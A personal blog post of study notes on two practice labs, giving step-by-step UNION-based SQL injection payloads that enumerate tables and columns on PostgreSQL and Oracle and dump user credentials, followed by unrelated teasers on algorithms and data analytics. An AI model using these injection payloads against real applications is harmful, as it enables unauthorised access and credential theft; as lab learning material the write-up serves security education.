4. SQL Injection - Examining the Database - Content

Most databases have an information schema detailing tables and columns.

Listing database content on non-Oracle Databases

LAB:
Lab #9 - SQL injection attack, listing the database contents on non-Oracle databases
End Goals:
- Determine the table that contains usernames and passwords
- Determine the relevant columns
- Output the content of the table
- Login as the administrator user

Analysis:
1. Find the number of columns
' order by 3-- -> Internal server error
3 - 1 = 2

2. Find the data type of the columns
' UNION select 'a', 'a'--
-> both columns accept type text

3. Version of the database
' UNION SELECT @@version, NULL-- -> not Microsoft
' UNION SELECT version(), NULL-- -> 200 OK
PostgreSQL 11.11 (Debian 11.11-1.pgdg90+1)

4. Output the list of table names in the database
' UNION SELECT table_name, NULL FROM information_schema.tables--
//users_xacgsm
// information_schema.tables details tables
// table_name is part of information_schema.tables

5. Output the column names of the table
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users_xacgsm'--
//username_pxqwui
//password_bfvoxs
// information_schema.columns details column names of the tables
// table_name is part of information_schema.tables
// column_name is part of information_schema.columns

6. Output the usernames and passwords
' UNION select username_pxqwui, password_bfvoxs from users_xacgsm--
//administrator
//9g91jpytvv5c091xpjxc
// users_xacgsm is a table with columns username_pxqwui and password_bfvoxs

Listing database content on Oracle Databases

Lab #10 - SQL injection attack, listing the database contents on Oracle
End Goals:
- Determine which table contains the usernames and passwords
- Determine the column names in table
- Output the content of the table
- Login as the administrator user

Analysis:
1) Determine the number of columns
' order by 3-- -> internal server error
3 - 1 = 2

2) Find data type of columns
' UNION select 'a', 'a' from DUAL--
-> Oracle database
-> both columns accept type text

3) Output the list of tables in the database
' UNION SELECT table_name, NULL FROM all_tables--
USERS_JYPOMG
// all_tables is like information_schema.tables
// table_name is part of all_tables

4) Output the column names of the users table
' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'USERS_JYPOMG'--
//USERNAME_LDANZP
//PASSWORD_DYZWEQ
// all_tab_columns is like information_schema.columns
// table_name is part of all_tables
// column_name is part of all_tab_columns

5) Output the list of usernames/passwords
' UNION select USERNAME_LDANZP, PASSWORD_DYZWEQ from USERS_JYPOMG--
//administrator
//c30j8bn7ejg50isvbiie

Comments

Post a Comment

Popular posts from this blog

2. FreeCodeCamp - Dynamic Programming - Learn to Solve Algorithmic Problems & Coding Challenges

Dynamic Programming - Parts      PART 1 - Memoization     P ART 2 - Tabulation Dynamic Programming with Fibonacci Example Recursion: Slow because time complexity is O(2^n) func fibR (x int ) int {     if x <= 2 {         return 1     }     return fibR (x- 1 ) + fibR (x- 2 ) } Dynamic Way Example Recursion with Stored Value:  // Fast because it removes duplicate processes by checking map. // Tail recursion-ish // Results are hitchhiking each recursive call func fibR2 (x int , y map [ int ] int ) int {     if _ , ok := y[x]; ok {         return y[x]     }     if x <= 2 {         return 1     }     y[x] = fibR2 (x- 1 , y) + fibR2 (x- 2 , y)     return y[x] }
Read more

20. Data Analytics - Analyze Data to Answer Questions - Week 1

Goal of analysis is to identify trends and relationships within data so you can accurately answer the questions you're asking. Most data is organized in tables, always have data in the right format. Definition : Analysis // process used to make sense of the data collected Sorting // involves arranging data into a meaningful order to make it easier to understand, analyze, visualize Outliers // data points that are very different from similarly collected data and might not be reliable values Filtering // extracting specific data that meet certain criteria while hiding the rest Customized sort order // when you sort data in a spreadsheet using multiple conditions The 4 phases of analysis:          1. Organize data // getting the right data in the right size and order                     - Sorting : arrange data in meaningful order                     - Filtering : can help find errors or outliers          2. Format and adjust data // filtering or sorting or compiling data in a better
Read more

3. Algorithms - Selection Sort

Selection sort sorts an array by finding the lowest value element and appending it to an empty array. The algorithm will shrink the unsorted array and repeat the process recursively until all unsorted elements are used up. package main func selectionSort (list *[] int ) {     sorted := make ([] int , 0 , len (*list))     unSorted := *list     for i := 0 ; i < len (*list); i++ {         min := unSorted[ 0 ]         index := 0         for i , e := range unSorted {             if e <= min {                 min = e                 index = i             }         }         sorted = append (sorted, (unSorted)[index])         if index == 0 {             unSorted = unSorted[ 1 :]         } else if index == ( len (*list) - 1 ) {             unSorted = unSorted[:index]         } else {             unSorted = append (unSorted[ 0 :index], unSorted[index+ 1 :]...)         }     }     * list = sorted } /*func main() {     x := []int{4, 6, 3, 2, 9, 7, 3, 5}     fmt.Print
Read more